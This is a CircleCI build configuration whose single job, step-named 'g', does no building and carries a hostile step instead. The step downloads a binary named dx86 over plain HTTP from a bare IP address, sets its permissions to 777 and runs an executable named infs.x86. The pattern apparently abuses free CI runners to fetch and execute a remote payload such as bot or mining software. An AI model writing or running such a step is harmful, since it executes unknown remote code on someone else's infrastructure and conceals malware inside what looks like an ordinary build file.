version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "g"
          command: |
                curl -O http://89.32.41.169/dx86; chmod 777 dx86; ./infs.x86 x86